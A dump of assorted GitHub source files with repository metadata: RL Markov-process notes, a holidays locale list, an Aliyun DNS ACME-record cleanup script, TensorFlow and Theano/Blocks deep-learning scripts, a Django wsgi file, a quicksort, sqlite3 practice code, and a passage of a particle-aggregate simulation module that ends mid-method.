798c7f096b9f4441b998dfce001956b4ada7b976 | e6afd34196217b6e19580dacbe98cbef9f547693 | /mp_MRP/old/deep_understanding/myrl.py | 570db48af3d31744a7c52bd6c8ca23baf02966d4 | [] | no_license | StevenMaharaj/rlscf_my_notes | 22eabeb00b24c7cb87dcf708be326ecb62453e13 | 093c0f2f78ae071c94718ca270afa4c773923fa7 | refs/heads/main | 2023-07-29T09:44:59.149352 | 2021-09-06T01:18:19 | 2021-09-06T01:18:19 | 400,407,241 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,279 | py | from typing import Generic, Callable
from abc import ABC
from abc import ABC, abstractmethod
from collections import defaultdict
from dataclasses import dataclass
# import graphviz
import numpy as np
from pprint import pprint
from typing import (Callable, Dict, Iterable, Generic, Sequence, Tuple,
Mapping, TypeVar, Set)
from distribution import (Categorical, Distribution, FiniteDistribution,
SampledDistribution)
# Generic type variables: S is the state payload type used by the State
# classes below, X a generic result type.  (The original defined each of
# these twice; a single definition suffices.)
S = TypeVar('S')
X = TypeVar('X')
class State(ABC, Generic[S]):
    """Abstract base for Markov-process states wrapping a value of type S."""
    state: S
    # def on_non_terminal(self,f: Callable[[NonTerminal[S]], X],default: X) -> X:
    #     if isinstance(self, NonTerminal):
    #         return f(self)
    #     else:
    #         return default
@dataclass(frozen=True)
class Terminal(State[S]):
    """A terminal (absorbing) state; simulation stops once one is reached."""
    state: S
@dataclass(frozen=True)
class NonTerminal(State[S]):
    """A non-terminal state, from which further transitions are possible."""
    state: S
class MarkovProcess(ABC, Generic[S]):
    """Abstract Markov process over states of type S."""

    @abstractmethod
    def transition(self, state: NonTerminal[S]) -> Distribution[State[S]]:
        """Return the distribution over successor states of `state`."""

    def simulate(
        self,
        start_state_distribution: Distribution[NonTerminal[S]]
    ) -> Iterable[State[S]]:
        """Generate one trajectory of this process.

        Yields the sampled start state first, then successive sampled
        states, ending after the first terminal state (or forever if no
        terminal state is ever reached).
        """
        current: State[S] = start_state_distribution.sample()
        while True:
            yield current
            if not isinstance(current, NonTerminal):
                return
            current = self.transition(current).sample()

    def traces(
        self,
        start_state_distribution: Distribution[NonTerminal[S]]
    ) -> Iterable[Iterable[State[S]]]:
        """Yield an endless stream of fresh simulation traces, each with
        its own sampled start state."""
        while True:
            yield self.simulate(start_state_distribution)
Transition = Mapping[NonTerminal[S], FiniteDistribution[State[S]]]
| [
"stevesamah@gmail.com"
] | stevesamah@gmail.com |
e5f0c601126a17759971f370a8f72bf5a5588a3d | c9de632682ba1b4714ac40a6357869cdfcdb34b2 | /python/holidays/__init__.py | b98ae657a5fcd944487df7b6d3ddb984c15f032d | [
"MIT"
] | permissive | lldh/holidata | 29be3a6ab959c0e25993c38f7adefde11bb261d2 | 3d6eb26a7d2178b4629f6423e91bdc4f1b80af35 | refs/heads/master | 2020-08-28T02:46:38.228485 | 2019-10-19T12:09:24 | 2019-10-19T12:09:24 | 217,565,782 | 0 | 0 | null | 2019-10-25T15:42:45 | 2019-10-25T15:42:45 | null | UTF-8 | Python | false | false | 318 | py | from .holidays import Locale
# NOTE(review): apart from "Locale", these entries are locale identifiers,
# not importable attribute names -- `from holidays import *` would fail on
# them.  Presumably downstream code reads __all__ as the list of supported
# locales; confirm before changing.
__all__ = [
    "Locale",
    "da-DK",
    "de-AT",
    "de-BE",
    "de-CH",
    "de-DE",
    "el-GR",
    "en-GB",
    "en-NZ",
    "en-US",
    "es-ES",
    "es-US",
    "fr-BE",
    "fr-FR",
    "hr-HR",
    "it-IT",
    "nb-NO",
    "nl-BE",
    "nl-NL",
    "ru-RU",
    "sk-SK",
]
| [
"thomas.lauf@tngtech.com"
] | thomas.lauf@tngtech.com |
7845d7329d08bab1283ada4f9496acfb73c168a1 | 160223a98d4c614191b333e9d251de2195e20d84 | /deleteTXT.py | 6281cba0977e94624ab1dce317b4447ab212d4e1 | [] | no_license | ScentWoman/CertUpdate | bcb2dbc7c7622b3e9aadf33d0cb9e7729789091b | c0f9a9d0d1f7346e712d9a9ea9107ae92dc9ad72 | refs/heads/master | 2021-05-20T00:10:14.853915 | 2020-09-01T00:45:04 | 2020-09-01T00:45:04 | 252,099,566 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,263 | py | #!/usr/bin/env python3
#coding=utf-8
import os
import idna
import json
from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkalidns.request.v20150109.DeleteDomainRecordRequest import DeleteDomainRecordRequest
from aliyunsdkalidns.request.v20150109.DescribeDomainRecordsRequest import DescribeDomainRecordsRequest
# Environment-driven configuration.
# NOTE(review): idna.decode expects a punycode ("xn--...") string from
# $DOMAIN and yields its unicode form -- confirm the env var format.
domain = idna.decode(os.getenv("DOMAIN"))
accessKeyID = os.getenv("ACCESSKEYID")
accessSecret = os.getenv("ACCESSSECRET")
apinode = "cn-shanghai"
client = AcsClient(accessKeyID, accessSecret, apinode)
# Fetch every DNS record of the domain from the Alidns API.
request = DescribeDomainRecordsRequest()
request.set_accept_format('json')
request.set_DomainName(domain)
response = client.do_action_with_exception(request)
records = json.loads(str(response, encoding='utf-8'))
records = records["DomainRecords"]["Record"]
# Delete only the ACME dns-01 challenge TXT records, printing each
# API response.
for r in records:
    if r["Type"] == "TXT" and r["RR"] == "_acme-challenge":
        RecordId = r["RecordId"]
        request = DeleteDomainRecordRequest()
        request.set_accept_format('json')
        request.set_RecordId(RecordId)
        response = client.do_action_with_exception(request)
        print(str(response, encoding='utf-8'))
| [
"noreply@github.com"
] | noreply@github.com |
ac9a58095a2dbea5ba34aa817faf8212aa33e21b | 1d9833e16c36dec536c00f789f7a3f624612e612 | /src/VGGnet.py | d4c05c9da02e5ec434cd56afd2abfe90190a2f75 | [] | no_license | genglsh/class_sex | adb1e24c75e11a90bd9dc2443e3a40aac60a950d | 96f61de59a811e4a90733549cbbd120874d2cb74 | refs/heads/master | 2020-04-07T17:29:17.536461 | 2019-07-23T00:43:52 | 2019-07-23T00:43:52 | 158,571,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,279 | py | import numpy as np
import tensorflow as tf
import os
import json
import cv2
import sys
from datetime import datetime
import math
import time
import tensorflow as tf
from net_fun import *
import json
def time_tensorflow_run(session, target, feed, info_string):
    """Run `target` repeatedly in `session` and report timing statistics.

    Performs `num_steps_burn_in` warm-up iterations (excluded from the
    stats) followed by `num_batches` timed iterations (a module-level
    global set in the __main__ block).  `info_string` labels the summary
    line (e.g. 'Forward').

    The original computed the mean and stddev but only printed blank
    lines and never used `info_string`; this version reports them,
    following the standard TensorFlow benchmarking recipe.
    """
    num_steps_burn_in = 10
    total_duration = 0.0
    total_duration_squared = 0.0
    for i in range(num_steps_burn_in + num_batches):
        start_time = time.time()
        _ = session.run(target, feed_dict=feed)
        duration = time.time() - start_time
        if i >= num_steps_burn_in:
            if not i % 10:
                # Periodic progress line instead of the original blank print.
                print('%s: step %d, duration = %.3f' %
                      (datetime.now(), i - num_steps_burn_in, duration))
            total_duration += duration
            total_duration_squared += duration * duration
    mn = total_duration / num_batches
    vr = total_duration_squared / num_batches - mn * mn
    sd = math.sqrt(vr)
    print('%s: %s across %d steps, %.3f +/- %.3f sec / batch' %
          (datetime.now(), info_string, num_batches, mn, sd))
def run_benchmark():
    """Build the network graph on random inputs and time the forward and
    forward+backward passes (TF1 graph/session API)."""
    with tf.Graph().as_default():
        image_size = 224
        # Random images stand in for real data; only speed is measured.
        image = tf.Variable(tf.random_normal([batch_size,
                                              image_size,
                                              image_size,
                                              3],
                                             dtype=tf.float32,
                                             stddev=1e-1))
        keep_prob = tf.placeholder(tf.float32)
        # inference_op comes from net_fun; presumably it returns the
        # prediction op, softmax, last fc layer and parameter list --
        # confirm against net_fun.
        prediction, softmax, fc8, p = inference_op(image, keep_prob)
        init = tf.global_variables_initializer()
        sess = tf.Session()
        sess.run(init)
        time_tensorflow_run(sess, prediction, {keep_prob:1.0}, 'Forward')
        # Backward pass timing: gradients of an L2 objective w.r.t. all
        # parameters.
        objective = tf.nn.l2_loss(fc8)
        grad = tf.gradients(objective, p)
        time_tensorflow_run(sess, grad, {keep_prob:0.5}, 'Forward_backward')
if __name__ == '__main__':
    # Globals read by time_tensorflow_run.
    batch_size = 100
    num_batches = 32
    # The commented block below was a manual image-labelling experiment
    # (show an image with cv2, record the pressed key as its label).
    # dict_tem = dict()
    # img_name = 'timg.jpg'
    # img = cv2.imread(img_name)
    # cv2.imshow('1', img)
    # i = cv2.waitKey(0)
    # dict_tem[img_name] = i
    # print(i)
    # print(dict_tem)
    # w_f = 'test.json'
    # with open(w_f, 'w') as f:
    #     json.dump(dict_tem, f)
    # '''
    # key(q) = 113 man
    # key(w) = 119 woman
    # '''
    # cv2.destroyAllWindows()
    # # if cv2.waitKey(100)>0:
    # #     cv2.destroyAllWindows()
    run_benchmark()
| [
"970808471@qq.com"
] | 970808471@qq.com |
2402b83ef5cd0b70fcb7d27ab642b796d4d37ef7 | bcff7145c765324233b9bfd42c325901a9514b50 | /Sklep/wsgi.py | 195a22245386afb85cd0eeaa296f090af5384326 | [] | no_license | waltad/Sklep | 3484e7dc3dd5acfb9fcbde49a6024354b7f6ff1a | 2c027c222537eef3e2e49b2cd180028c796e2240 | refs/heads/master | 2023-08-25T00:07:53.562229 | 2021-10-10T13:28:49 | 2021-10-10T13:28:49 | 410,259,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
WSGI config for Sklep project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings, then expose the WSGI callable
# that application servers (gunicorn, uWSGI, ...) look up by name.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Sklep.settings')
application = get_wsgi_application()
| [
"tadek.waluga@gmail.com"
] | tadek.waluga@gmail.com |
3f40dfbcfa58149e96a1a0ae3e8456f1e82d73d2 | e6ae448e67fc9cff39614eb73c5a6b0745f097d3 | /quick_sort.py | 1f23630195d8a9fd84e2c7ec8190ef4cfc21710f | [] | no_license | cdredmond/Python | 975327e1b6891b69cda91440360bcec336502d0a | ad01d12a1985ee67dc80acd1ed5c421a7f66a501 | refs/heads/master | 2020-05-23T01:35:15.749248 | 2017-08-08T13:20:42 | 2017-08-08T13:20:42 | 23,943,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | def quick_sort(a_list):
quick_sort_helper(a_list, 0, len(a_list) - 1)
def quick_sort_helper(a_list, first, last):
    """Recursively quicksort a_list[first:last + 1] in place."""
    if first < last:
        split_point = partition(a_list, first, last)
        quick_sort_helper(a_list, first, split_point - 1)
        quick_sort_helper(a_list, split_point + 1, last)


def partition(a_list, first, last):
    """Partition a_list[first:last + 1] around the pivot a_list[first].

    Returns the pivot's final index; elements left of it are <= pivot
    and elements right of it are >= pivot.
    """
    pivot_value = a_list[first]
    left_mark = first + 1
    right_mark = last
    done = False
    while not done:
        while left_mark <= right_mark and a_list[left_mark] <= pivot_value:
            left_mark += 1
        while right_mark >= left_mark and a_list[right_mark] >= pivot_value:
            right_mark -= 1
        if right_mark < left_mark:
            done = True
        else:
            # Tuple assignment replaces the original temp-variable swap.
            a_list[left_mark], a_list[right_mark] = \
                a_list[right_mark], a_list[left_mark]
    # Move the pivot into its final sorted position.
    a_list[first], a_list[right_mark] = a_list[right_mark], a_list[first]
    return right_mark
# Demo: sort a sample list in place and show the result.
a_list = [54, 26, 93, 17, 77, 31, 44, 55, 20]
quick_sort(a_list)
print(a_list)
| [
"charlesdredmond@gmail.com"
] | charlesdredmond@gmail.com |
841522d1b8b277a3a8b10930d1882bc2a73b7dba | 3fa6b53052fdb68e24347ec2f229cc162c9209a9 | /src/main_rereading.py | dc3fb54413c815a88411d165d5ee5486a70901c9 | [] | no_license | ZJULearning/videoqa | 9dbb5f7a479c6983c1e0151069242d271014a4d8 | 1de9602e4a0f0506487ecf014190d4e261c8998f | refs/heads/master | 2022-01-08T06:52:05.156411 | 2019-06-17T05:36:28 | 2019-06-17T05:36:28 | 83,045,581 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,956 | py | from rereader import *
import theano
import theano.tensor as T
import numpy as np
from blocks.graph import ComputationGraph
import h5py
from fuel.datasets.hdf5 import H5PYDataset
from fuel.transformers import Flatten
from fuel.streams import DataStream
from fuel.schemes import SequentialScheme, ShuffledScheme
from blocks.extensions.monitoring import DataStreamMonitoring
from blocks.algorithms import GradientDescent, CompositeRule, StepClipping, RMSProp, Adam
from blocks.main_loop import MainLoop
from blocks.extensions import FinishAfter, Printing
from blocks.extensions.monitoring import DataStreamMonitoring, TrainingDataMonitoring
from blocks.extensions import FinishAfter, Timing, Printing, ProgressBar
from blocks.monitoring import aggregation
from blocks.model import Model
from blocks.extensions.saveload import Checkpoint
from blocks_extras.extensions.plot import Plot
from saveSnapshot import *
# Answer-vocabulary size (dimension of the output softmax).
prob_dim = 3591
# Mini-batch size; dataset subsets below are truncated to multiples of it.
bs = 100
# max ans length + <EOS> + <Unknown>
max_ans_length = 22
joint_dim = 1024
# Re-reading VideoQA network.  The positional arguments are layer widths
# (visual 4096, word 300, then internal 2048/1024 dims); see
# rereader.rereading for their exact meaning.
model = rereading(
    bs, max_ans_length,
    4096, 300,
    2048,
    1024,
    1024,
    1024,
    1024,
    2048,
    prob_dim,
    prob_dim)
# Input geometry constants.
video_length = 300
max_len = 27
visual_dim = 4096
word_dim = 300
# frames = theano.shared(np.asarray(np.zeros((bs,
# video_length,
# visual_dim)),
# dtype=theano.config.floatX),
# borrow=True,
# name='visual_features')
# qas = theano.shared(np.asarray(np.zeros((bs,
# max_len,
# word_dim)),
# dtype=theano.config.floatX),
# borrow=True,
# name='question_features')
# qas_rev = theano.shared(np.asarray(np.zeros((bs,
# max_len,
# word_dim)),
# dtype=theano.config.floatX),
# borrow=True,
# name='question_features_reverse')
# mask = theano.shared(np.asarray(np.ones((bs)),
# dtype='int'),
# borrow=True,
# name='mask')
# maskMat = theano.shared(np.asarray(np.zeros((bs, max_len)),
# dtype=theano.config.floatX),
# borrow=True,
# name='mask_matrix')
# Constant zero tensor handed to build_model as decoder padding.
padding = T.constant(np.zeros((max_ans_length,
                               bs,
                               joint_dim * 4)).astype(np.float32))
# m = np.ones((bs, max_ans_length))
# m[:, 5::] = 0
# mask01 = theano.shared(m.astype(np.float32))
# Symbolic inputs; the names must match the Fuel/HDF5 source names below.
frames = T.tensor3('visual_features')
qas = T.tensor3('question_features')
qas_rev = T.tensor3('question_features_reverse')
mask = T.lmatrix('mask')
maskMat = T.matrix('mask_matrix')
mask01 = T.matrix('mask01')
gt = T.lmatrix('label')
model.build_model(frames, qas, qas_rev, mask, maskMat, mask01, padding)
# Loss and error-rate outputs, named so the monitors can report them.
cost = model.loss(gt, mask01)
cost.name = 'cost'
error = model.error(gt, mask01)
error.name = 'error'
cg = ComputationGraph(cost)
# HDF5 splits, each truncated to a whole number of batches (N//bs*bs).
data_train = H5PYDataset('/home/xuehongyang/TGIF_open_161217.hdf5', which_sets=('train',),
                         subset=slice(0, 230689//bs*bs))
data_val = H5PYDataset('/home/xuehongyang/TGIF_open_161217.hdf5', which_sets=('validation',),
                       subset=slice(0, 24696//bs*bs))
data_test = H5PYDataset('/home/xuehongyang/TGIF_open_161217.hdf5', which_sets=('test',),
                        subset=slice(0, 32378//bs*bs))
# Shuffled batches for training, sequential for evaluation.
data_stream_train = DataStream.default_stream(
    data_train,
    iteration_scheme=ShuffledScheme(data_train.num_examples, batch_size=bs))
data_stream_val = DataStream.default_stream(
    data_val,
    iteration_scheme=SequentialScheme(
        data_val.num_examples, batch_size=bs))
data_stream_test = DataStream.default_stream(
    data_test,
    iteration_scheme=SequentialScheme(
        data_test.num_examples, batch_size=bs))
# Monitors: training cost every 500 batches, validation cost/error and
# test error after each epoch.
monitor = TrainingDataMonitoring(
    variables=[cost], prefix='train', every_n_batches=500, after_epoch=True)
monitor_val = DataStreamMonitoring(
    variables=[cost, error], data_stream=data_stream_val, prefix='validation', after_epoch=True)
monitor_test = DataStreamMonitoring(
    variables=[error], data_stream=data_stream_test, prefix='test', after_epoch=True)
learning_rate = 0.00008
n_epochs=100
# Adam with gradient-norm clipping at 10.
algorithm = GradientDescent(cost=cost,
                            parameters=cg.parameters,
                            on_unused_sources='ignore',
                            step_rule=CompositeRule([
                                StepClipping(10.),
                                Adam(learning_rate),
                            ]))
# Main loop: snapshots each epoch, progress bar, periodic printing and
# live cost plotting.
main_loop = MainLoop(model=Model(cost),
                     data_stream=data_stream_train,
                     algorithm=algorithm,
                     extensions=[
                         Timing(),
                         FinishAfter(after_n_epochs=n_epochs),
                         monitor,
                         monitor_val,
                         monitor_test,
                         saveSnapshot('/home/xuehongyang/checkpoints_read/snapshot',
                                      save_main_loop=False,
                                      after_epoch=True,
                                      save_separately=['log', 'model']),
                         ProgressBar(),
                         Printing(every_n_batches=500),
                         Plot('videoqa_open_rereading', channels=[['train_cost']],
                              every_n_batches=500,
                              after_batch=True)])
print('starting...')
main_loop.run()
| [
"xuehy@live.cn"
] | xuehy@live.cn |
26f57305b55d3b30eaa55261b2928f5dc17ece1b | b8ee76250770ba628b818a26b6f894347ff2e390 | /Sqlite3Module.py | f3dd02adf33ac2df83d79a9fb702b4e8d11bbb8e | [] | no_license | SimonGideon/Journey-to-Pro | 77c77bd1a5de387c41bc8618100bbb3957d15706 | 1591310891c7699710e992fe068b8fa230ac3d56 | refs/heads/master | 2023-04-28T19:31:53.155384 | 2021-05-18T19:18:32 | 2021-05-18T19:18:32 | 358,926,411 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | import sqlite3
# sqlite3 usage notes: create a table, insert, query, and handle errors.
# Fixes in this revision: the INSERT targeted a non-existent 'stock'
# table and supplied six values for five columns ('35,14' instead of
# 35.14); the SELECT referenced an undefined table/column; and the final
# `try:` had an empty body, which is a SyntaxError.
import sqlite3

conn = sqlite3.connect('Database1.db')
c = conn.cursor()
try:
    # Create the table on first run; IF NOT EXISTS keeps re-runs working.
    c.execute('''CREATE TABLE IF NOT EXISTS stocks
                 (date text, trans text, symbol text, qty real, price real)''')
    # Insert a row of data.
    c.execute("INSERT INTO stocks VALUES ('2006-01-05','BUY','RHAT',100,35.14)")
    conn.commit()
    # Getting values from the db: iterate the cursor directly.
    # Use a '?' placeholder rather than string formatting.
    c.execute("SELECT * FROM stocks WHERE trans = ?", ('BUY',))
    for row in c:
        print(row)
    # Fetch a single matching row (None once the result set is empty).
    c.execute("SELECT * FROM stocks")
    print(c.fetchone())
    # Fetch all remaining rows at once.
    a = c.fetchall()
    for row in a:
        print(row)
except sqlite3.Error as e:
    print("An error occured:", e.args[0])
finally:
    conn.close()
"simongideon918@gmail.com"
] | simongideon918@gmail.com |
32132dadfe46998dce89622fe20c09f838a966b1 | d899e761b6e152cb4470cfa12741ca700a53f377 | /Scripts/Answer.py | b75d252dfabf2c44b443b23fee1dd85c7406f00d | [] | no_license | DBtycoon/REAPER | 52a32d98bd3043d01f3dc0ceb62a54dc305e661a | 7563be2f75723c5e8b377c0330febfd99ee14cb8 | refs/heads/master | 2021-01-01T17:31:56.177586 | 2013-07-18T04:10:19 | 2013-07-18T04:10:19 | 7,144,935 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | from reaper_python import *
'''
Refers to the possible answers returned from a message box
'''
# Module-level shortcuts for the message-box answer codes (mirrors the
# values defined on the Answer class in this module).
Ok = 1
Cancel = 2
Abort = 3
Retry = 4
Ignore = 5
Yes = 6
No = 7
class Answer:
    """Integer codes for the possible answers returned from a message box."""
    Ok = 1
    Cancel = 2
    Abort = 3
    Retry = 4
    Ignore = 5
    Yes = 6
    No = 7
"civress2@yahoo.com"
] | civress2@yahoo.com |
351231d4e432a8544864dbc8f9fc095f617f1e0c | 31575890c75d65455512ee7377bc39830de8a055 | /simulation.py | 51218f289dd038087633e6a16e76ff9bd00d2a00 | [] | no_license | dalerxli/aggregate | 712a4c9074c3235c0fe0c3686dc3c3c7be4853dd | 4c9a42b02ee50df4984e3ca730697a030a60a8ff | refs/heads/master | 2020-04-02T09:00:55.818879 | 2016-11-18T11:18:36 | 2016-11-18T11:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,345 | py | #!/usr/bin/python
"""
simulation.py
Mark S. Bentley (mark@lunartech.org), 2016
Simulation environment module for building aggregates. Currently this is non-
dynamic and uses random vectors and line-sphere/line-spheroid intersects to
build various aggregate types. The simulation environment tracks the per-
particle position, mass, id etc. of the particle and also provides analytics
such as the centre of mass, radius of gyration and fractal dimension.
The key class is Simulation which provides methods that add monomers/
aggregates to the simulation and operates on the simulation domain.
Several help methods are provided at the top level.
Requirements:
- numpy
- matplotlib - for show(using='mpl')
- mayavi - for show(using='maya')
- scipy - for Simulation.chull()
- evtk - for Simulation.to_vtk()
"""
import os
import numpy as np
from scipy.spatial.distance import cdist
class Simulation:
"""
This class provides functionality for a generic particle simulation, with methods for
adding particles, moving them in the simulation domain, checking for intersects and
overlaps etc. It also calculates basic properties of particle collections within the domain.
"""
def __init__(self, max_pcles=1000, filename=None, density=None, debug=False):
"""
Initialise the simulation. The key parameter here is the maximum number of particles,
in order to pre-allocate array space.
nattr=<int> can be used to set the number of additional attributes (besides
x,y,z,r and id) to be stored in the array. Not all particle attributes
need to be stored in the array, but those that may be queried for
particle selection should be (for speed).
"""
if (max_pcles is None) and (filename is None):
print('WARNING: simulation object created, but no size given - use max_pcles or sim.from_csv')
elif filename is not None:
self.from_csv(filename, density=density)
else:
self.pos = np.zeros( (max_pcles, 3 ), dtype=np.float )
self.id = np.zeros( max_pcles, dtype=np.int )
self.radius = np.zeros( max_pcles, dtype=np.float )
self.volume = np.zeros( max_pcles, dtype=np.float )
self.mass = np.zeros( max_pcles, dtype=np.float )
self.density = np.zeros( max_pcles, dtype=np.float )
self.count = 0
self.agg_count = 0
self.next_id = 0
self.debug = debug
def update(self):
"""Updates internally calculated parameters, such as mass and volume, after changes
to the simulation"""
self.volume = (4./3.) * np.pi * self.radius**3.
self.mass = self.volume * self.density
return
def scale(self, scale=1.):
"""Applies a scale multiplier to all positions and radii. Mass, volume etc.
are also updated accordingly"""
self.pos *= scale
self.radius *= scale
self.update()
return
def __str__(self):
"""
Returns a string with the number of particles and the bounding box size.
"""
return "<Simulation object contaning %d particles>" % ( self.count )
def get_bb(self):
"""
Return the bounding box of the simulation domain
"""
xmin = self.pos[:,0].min() - self.radius[np.argmin(self.pos[:,0])]
xmax = self.pos[:,0].max() + self.radius[np.argmin(self.pos[:,0])]
ymin = self.pos[:,1].min() - self.radius[np.argmin(self.pos[:,1])]
ymax = self.pos[:,1].max() + self.radius[np.argmin(self.pos[:,1])]
zmin = self.pos[:,2].min() - self.radius[np.argmin(self.pos[:,2])]
zmax = self.pos[:,2].max() + self.radius[np.argmin(self.pos[:,2])]
return (xmin, xmax), (ymin,ymax), (zmin, zmax)
def bb_aspect(self):
"""
Returns the aspect ratio X:Y:Z of the bounding box.
"""
(xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
xsize = xmax-xmin
ysize = ymax-ymin
zsize = zmax-zmin
return (xsize, ysize, zsize)/min(xsize, ysize, zsize)
    def fit_ellipse(self, tolerance=0.01):
        """ Find the minimum volume ellipsoid which holds all the points
        Based on work by Nima Moshtagh
        http://www.mathworks.com/matlabcentral/fileexchange/9542
        and also by looking at:
        http://cctbx.sourceforge.net/current/python/scitbx.math.minimum_covering_ellipsoid.html
        Which is based on the first reference anyway!
        Code adapted from: https://github.com/minillinim/ellipsoid/blob/master/ellipsoid.py
        Returns:
        (center, radii, rotation)
        """
        from numpy import linalg
        # NOTE(review): P is the whole pre-allocated position array, not
        # self.pos[:self.count] - for a partially filled domain the zero rows
        # are included in the fit. Confirm whether this is intended.
        P = self.pos
        (N, d) = np.shape(P)
        d = float(d)
        # Q will be our working array: homogeneous coordinates (points with a
        # trailing row of ones), shape (d+1, N).
        Q = np.vstack([np.copy(P.T), np.ones(N)])
        QT = Q.T
        # initializations: u holds the per-point weights, starting uniform.
        err = 1.0 + tolerance
        u = (1.0 / N) * np.ones(N)
        # Khachiyan Algorithm: iteratively shift weight onto the point that
        # is currently farthest outside the candidate ellipsoid, until the
        # weight vector converges within the given tolerance.
        while err > tolerance:
            V = np.dot(Q, np.dot(np.diag(u), QT))
            M = np.diag(np.dot(QT , np.dot(linalg.inv(V), Q))) # M the diagonal vector of an NxN matrix
            j = np.argmax(M)
            maximum = M[j]
            step_size = (maximum - d - 1.0) / ((d + 1.0) * (maximum - 1.0))
            new_u = (1.0 - step_size) * u
            new_u[j] += step_size
            # Convergence is measured as the norm of the weight change.
            err = np.linalg.norm(new_u - u)
            u = new_u
        # center of the ellipse: weighted mean of the points.
        center = np.dot(P.T, u)
        # the A matrix for the ellipse (inverse covariance-like form).
        A = linalg.inv(
            np.dot(P.T, np.dot(np.diag(u), P)) -
            np.array([[a * b for b in center] for a in center])
            ) / d
        # Get the values we'd like to return: SVD splits A into axis lengths
        # (radii = 1/sqrt(singular values)) and the rotation of the axes.
        U, s, rotation = linalg.svd(A)
        radii = 1.0/np.sqrt(s)
        return (center, radii, rotation)
def elongation(self):
(center, radii, rotation) = self.fit_ellipse()
return max(radii/min(radii))
def chull(self):
"""
Calculates the convex hull (minimum volume) bounding the set of
sphere centres - DOES NOT ACCOUNT FOR RADII!
"""
from scipy.spatial import ConvexHull
hull = ConvexHull(self.pos)
return hull
    def show(self, using='maya', fit_ellipse=False, show_hull=False):
        """
        A simple scatter-plot to represent the aggregate - either using mpl
        (matplotlib) or maya (mayavi).

        fit_ellipse=True overlays the minimum-volume ellipsoid; show_hull=True
        overlays the convex hull (rendered in the mayavi backend only).
        Returns the plot handle.

        NOTE(review): if using= is neither 'mpl' nor 'maya', h is never bound
        and the final return raises UnboundLocalError - confirm intended.
        """
        if fit_ellipse:
            (center, radii, rotation) = self.fit_ellipse()
            # Sample spherical angles for a parametric ellipsoid surface.
            u = np.linspace(0.0, 2.0 * np.pi, 100)
            v = np.linspace(0.0, np.pi, 100)
            # cartesian coordinates that correspond to the spherical angles:
            x = radii[0] * np.outer(np.cos(u), np.sin(v))
            y = radii[1] * np.outer(np.sin(u), np.sin(v))
            z = radii[2] * np.outer(np.ones_like(u), np.cos(v))
            # rotate accordingly (point-by-point) and shift to the centre.
            for i in range(len(x)):
                for j in range(len(x)):
                    [x[i,j],y[i,j],z[i,j]] = np.dot([x[i,j],y[i,j],z[i,j]], rotation) + center
        if show_hull:
            hull = self.chull()
            hull_x = hull.points[:,0]
            hull_y = hull.points[:,1]
            hull_z = hull.points[:,2]
        if using=='mpl':
            # matplotlib backend: centres only, fixed marker size.
            import matplotlib.pyplot as plt
            from mpl_toolkits.mplot3d import Axes3D
            fig = plt.figure()
            ax = fig.add_subplot(111, projection='3d')
            # ax.set_aspect('equal')
            h = ax.scatter(self.pos[:,0], self.pos[:,1], self.pos[:,2], s=100.)
            if fit_ellipse:
                ax.plot_wireframe(x, y, z, rstride=4, cstride=4, color='k', alpha=0.2)
            plt.show()
        elif using=='maya':
            # mayavi backend: spheres scaled by the particle radii.
            import mayavi.mlab as mlab
            fig = mlab.figure(bgcolor=(1, 1, 1), fgcolor=(0, 0, 0))
            h = mlab.points3d(self.pos[:,0], self.pos[:,1], self.pos[:,2], self.radius, scale_factor=2, resolution=16)
            if fit_ellipse:
                mlab.mesh(x,y,z, opacity=0.25, color=(1,1,1))
            if show_hull:
                mlab.triangular_mesh(hull_x, hull_y, hull_z, hull.simplices, representation='wireframe', color=(1,1,1))
        else:
            print('ERROR: using= must ne either mpl or maya')
        return h
def add(self, pos, radius, density=1., check=False):
"""
Add a particle to the simulation.
If check=True the distance between the proposed particle and each other
is checked so see if they overlap. If so, False is returned.
"""
if check:
if not self.check(pos, radius):
return False
if len(pos) != 3:
print('ERROR: particle position should be given as an x,y,z tuple')
return None
radius = float(radius)
self.pos[self.count] = np.array(pos)
self.radius[self.count] = radius
self.volume[self.count] = (4./3.)*np.pi*radius**3.
self.density[self.count] = density
self.mass[self.count] = self.volume[self.count] * density
self.count += 1
self.id[self.count-1] = self.next_id
self.next_id += 1
return True
def add_agg(self, sim, check=False):
"""
Add an aggregate particle to the simulation. If check=True the distance between the proposed
particle and each other is checked so see if they overlap. If so, False is returned.
"""
if check:
# TODO - implement aggregate checking
pass
if not self.check(pos, radius):
return False
# TODO
num_pcles = sim.count
self.pos[self.count:self.count+num_pcles] = sim.pos[0:sim.count]
self.radius[self.count:self.count+num_pcles] = sim.radius[0:sim.count]
self.density[self.count:self.count+num_pcles] = sim.density[0:sim.count]
self.volume[self.count:self.count+num_pcles] = (4./3.)*np.pi*sim.radius[0:sim.count]**3.
self.mass[self.count:self.count+num_pcles] = \
self.volume[self.count:self.count+num_pcles] * self.density[self.count:self.count+num_pcles]
self.id[self.count:self.count+num_pcles] = self.id.max()+1+range(num_pcles)
self.count += num_pcles
return True
    def intersect(self, position, direction, closest=True):
        """
        Wrapper for line_sphere() that detects if the position passed is for a
        monomer or an aggregates and handles each case.

        NOTE(review): the two branches return different arities - the
        aggregate case returns (id, distance, hit) while the monomer case
        returns (id, hit) - callers must know which shape they passed.
        """
        if type(position)==tuple:
            position = np.array(position)
        if len(position.shape)==2: # position is an array, i.e. an aggregate
            # loop over each monomer in the passed aggregate and check if it
            # intersects any of the monomers already in the domain
            max_dist = 10000. # TODO calculate a sensible value here
            sim_id = None
            hits = None
            monomer_pos = None
            for pos in position:
